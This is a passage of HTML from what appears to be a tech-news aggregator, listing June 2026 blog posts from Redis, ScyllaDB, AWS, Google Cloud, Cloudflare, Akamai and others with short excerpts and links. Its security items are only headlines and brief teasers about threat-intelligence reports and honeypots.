<h3 id="h3-semantic-layer-vs-context-layer-where-bi-modeling-ends-ai-grounding-begins" class="group relative scroll-mt-24">
        <a href="#h3-semantic-layer-vs-context-layer-where-bi-modeling-ends-ai-grounding-begins" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Semantic layer vs context layer: where BI modeling ends & AI grounding begins
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-semantic-layer-vs-context-layer-where-bi-modeling-ends-ai-grounding-begins"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Your BI semantic layer solved a hard problem: getting every team, dashboard, and report to agree on what shared metrics like &quot;revenue,&quot; &quot;active customer,&quot; or &quot;customer acquisition cost&quot; actually mean.</p>
<p><strong>📅 Jun 3, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/semantic-layer-vs-context-layer/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-dear-cqlsh-your-dependencies-were-killing-us-ps-we-rewrote-you-in-rust" class="group relative scroll-mt-24">
        <a href="#h3-dear-cqlsh-your-dependencies-were-killing-us-ps-we-rewrote-you-in-rust" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Dear cqlsh: Your dependencies were killing us (P.S. We rewrote you in Rust)
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-dear-cqlsh-your-dependencies-were-killing-us-ps-we-rewrote-you-in-rust"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>A story of rewriting cqlsh in Rust…with Claude Code and a lot of planning Dear cqlsh, I vouched for you. I told the team you were fine. I forked you, catered to you, vendored your dependencies and you</p>
<p><strong>📅 Jun 2, 2026</strong> • <strong>📰 ScyllaDB Blog</strong></p>
<p><a href="https://www.scylladb.com/2026/06/02/rewrote-cqlsh-in-rust/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-beautiful-game-winning-at-scale-with-a-multi-agent-strategy" class="group relative scroll-mt-24">
        <a href="#h3-the-beautiful-game-winning-at-scale-with-a-multi-agent-strategy" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Beautiful Game: Winning at Scale with a Multi-Agent Strategy
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-beautiful-game-winning-at-scale-with-a-multi-agent-strategy"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>During major live sporting events, peak traffic reaches unprecedented levels, and customers expect a flawless in-the-moment experience. The right data infrastructure separates the platforms that win f</p>
<p><strong>📅 Jun 2, 2026</strong> • <strong>📰 Yugabyte Blog</strong></p>
<p><a href="https://www.yugabyte.com/blog/winning-at-scale-with-a-multi-agent-strategy/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-why-your-ai-doesnt-understand-your-business-how-teams-fix-it" class="group relative scroll-mt-24">
        <a href="#h3-why-your-ai-doesnt-understand-your-business-how-teams-fix-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Why your AI doesn't understand your business (& how teams fix it)
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-why-your-ai-doesnt-understand-your-business-how-teams-fix-it"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Your AI can summarize documents and answer questions about almost anything on the internet. But ask it about your business, and things fall apart. It pulls stale pricing, ignores internal policies, or</p>
<p><strong>📅 Jun 2, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/why-ai-misses-business-context/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-diving-deep-into-rediss-new-array-data-type" class="group relative scroll-mt-24">
        <a href="#h3-diving-deep-into-rediss-new-array-data-type" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Diving deep into Redis’s new array data type
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-diving-deep-into-rediss-new-array-data-type"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The most popular data types in Redis are strings, lists, hashes, sets, and sorted sets. Each is purpose-built around a specific way of organizing data, enabling developers to solve a wide range of tec</p>
<p><strong>📅 Jun 2, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/diving-deep-into-rediss-new-array-data-type/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-platforms" class="group relative scroll-mt-24">
        <a href="#h2-platforms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🌐 Platforms
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-platforms"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley" class="group relative scroll-mt-24">
        <a href="#h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Keep Your Tech Flame Alive: Trailblazer Rachel Bayley
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In this Akamai FLAME Trailblazer blog post, Rachel Bayley encourages women to step into the unknown and to be their authentic selves.</p>
<p><strong>📅 Jun 8, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/culture/2024/may/keep-your-tech-flame-alive-trailblazer-rachel-bayley"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-oracle-of-delphi-will-steal-your-credentials" class="group relative scroll-mt-24">
        <a href="#h3-the-oracle-of-delphi-will-steal-your-credentials" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Oracle of Delphi Will Steal Your Credentials
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-oracle-of-delphi-will-steal-your-credentials"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Our deception technology is able to reroute attackers into honeypots, where they believe that they found their real target. The attacks brute forced passwords for RDP credentials to connect to the vic</p>
<p><strong>📅 Jun 8, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-oracle-of-delphi-steal-your-credentials"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="group relative scroll-mt-24">
        <a href="#h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Nansh0u Campaign – Hackers Arsenal Grows Stronger
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In the beginning of April, three attacks detected in the Guardicore Global Sensor Network (GGSN) caught our attention. All three had source IP addresses originating in South-Africa and hosted by Volum</p>
<p><strong>📅 Jun 8, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-nansh0u-campaign-hackers-arsenal-grows-stronger"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-simplified-permissions-for-amazon-s3-tables-and-iceberg-materialized-views-are-now-available-in-aws-govcloud-us-regions" class="group relative scroll-mt-24">
        <a href="#h3-simplified-permissions-for-amazon-s3-tables-and-iceberg-materialized-views-are-now-available-in-aws-govcloud-us-regions" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Simplified permissions for Amazon S3 Tables and Iceberg materialized views are now available in AWS GovCloud (US) Regions
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-simplified-permissions-for-amazon-s3-tables-and-iceberg-materialized-views-are-now-available-in-aws-govcloud-us-regions"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AWS Glue Data Catalog now supports AWS IAM-based authorization for Amazon S3 Tables and Apache Iceberg materialized views. With IAM-based authorization, you can define all necessary permissions across</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/gdc-s3tables-simplified-permissions-in-aws-govcloud/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-opensearch-ui-is-now-available-in-govcloud-regions" class="group relative scroll-mt-24">
        <a href="#h3-amazon-opensearch-ui-is-now-available-in-govcloud-regions" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon OpenSearch UI is now available in GovCloud regions
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-amazon-opensearch-ui-is-now-available-in-govcloud-regions"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Amazon OpenSearch Service expands its modernized operational analytics experience to GovCloud regions, including AWS GovCloud (US-East) and AWS GovCloud (US-West), enabling users to gain insights acro</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/opensearch-ui-govcloud-region"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-whats-new-with-google-cloud" class="group relative scroll-mt-24">
        <a href="#h3-whats-new-with-google-cloud" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What’s new with Google Cloud
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-whats-new-with-google-cloud"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more. Tip: Not</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/inside-google-cloud/whats-new-google-cloud/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-seeking-counsel-ongoing-targeted-campaign-against-us-law-firms" class="group relative scroll-mt-24">
        <a href="#h3-seeking-counsel-ongoing-targeted-campaign-against-us-law-firms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-seeking-counsel-ongoing-targeted-campaign-against-us-law-firms"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Written by: Chad Reams, Tufail Ahmed, Keith Knapp, Ashley Frazer, Tyler McLellan Introduction From January through May 2026, Mandiant identified a financially motivated data theft extortion campaign e</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/threat-intelligence/targeted-campaign-us-law-firms/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-your-ai-bill-is-out-of-control-cloudflare-can-fix-it-now" class="group relative scroll-mt-24">
        <a href="#h3-your-ai-bill-is-out-of-control-cloudflare-can-fix-it-now" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Your AI bill is out of control. Cloudflare can fix it now.
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-your-ai-bill-is-out-of-control-cloudflare-can-fix-it-now"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AI Gateway now features real-time spend limits to prevent runaway token bills across multiple AI providers. By integrating with Cloudflare Access, companies can use identity-driven budgets and policie</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 Cloudflare Blog</strong></p>
<p><a href="https://blog.cloudflare.com/ai-gateway-spend-limits/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-from-metal-to-agent-why-agentic-ai-is-an-application-evolution" class="group relative scroll-mt-24">
        <a href="#h3-from-metal-to-agent-why-agentic-ai-is-an-application-evolution" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 From metal to agent: Why agentic AI is an application evolution
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-from-metal-to-agent-why-agentic-ai-is-an-application-evolution"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>We’re moving beyond simple prompts. The next frontier is agentic AI: autonomous systems that don’t just talk, but act across your enterprise. But as we move into this era, I’m hearing a consistent con</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/metal-agent-why-agentic-ai-application-evolution"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-model-evaluations-prove-your-routing-policy-actually-works" class="group relative scroll-mt-24">
        <a href="#h3-model-evaluations-prove-your-routing-policy-actually-works" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Model Evaluations: Prove Your Routing Policy Actually Works
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-model-evaluations-prove-your-routing-policy-actually-works"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Most teams running inference at scale do not fail because they cannot find a “good” model. They fail because they ship a routing policy that looks fine in a playground, but drifts the moment it sees r</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 DigitalOcean Blog</strong></p>
<p><a href="https://www.digitalocean.com/blog/model-evaluation-public-preview"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-whats-new-for-managed-service-for-apache-spark-clusters" class="group relative scroll-mt-24">
        <a href="#h3-whats-new-for-managed-service-for-apache-spark-clusters" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What's new for Managed Service for Apache Spark clusters
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-whats-new-for-managed-service-for-apache-spark-clusters"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>At Google Cloud, our goal is to let you run large-scale analytical and data science workloads with maximum efficiency so you can process big data pipelines, machine learning, and ETL tasks. We recentl</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/products/data-analytics/enhancements-to-managed-service-for-apache-spark-clusters/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-debug-deployment-failures-faster-with-the-deployments-tab-in-aws-elastic-beanstalk" class="group relative scroll-mt-24">
        <a href="#h3-debug-deployment-failures-faster-with-the-deployments-tab-in-aws-elastic-beanstalk" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Debug deployment failures faster with the Deployments tab in AWS Elastic Beanstalk
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-debug-deployment-failures-faster-with-the-deployments-tab-in-aws-elastic-beanstalk"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Introduction When a deployment fails, finding the root cause often means piecing together information from multiple sources. You wait for the deployment to finish, request a log bundle, download it, a</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 AWS DevOps Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/devops/debug-deployment-failures-faster-with-the-deployments-tab-in-aws-elastic-beanstalk/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-misc" class="group relative scroll-mt-24">
        <a href="#h2-misc" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📰 Misc
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-misc"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-visual-studio-code-1124" class="group relative scroll-mt-24">
        <a href="#h3-visual-studio-code-1124" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Visual Studio Code 1.124
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-visual-studio-code-1124"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Learn what&#39;s new in Visual Studio Code 1.124 (Insiders) Read the full article</p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 VS Code Blog</strong></p>
<p><a href="https://code.visualstudio.com/updates/v1_124"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-with-foundry-microsoft-bets-the-enterprise-ai-battle-is-about-reliability-not-capability" class="group relative scroll-mt-24">
        <a href="#h3-with-foundry-microsoft-bets-the-enterprise-ai-battle-is-about-reliability-not-capability" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 With Foundry, Microsoft bets the enterprise AI battle is about reliability, not capability
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-with-foundry-microsoft-bets-the-enterprise-ai-battle-is-about-reliability-not-capability"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The agentic AI wave has produced no shortage of impressive demos. What it has produced less of is agents that The post With Foundry, Microsoft bets the enterprise AI battle is about reliability, not c</p>
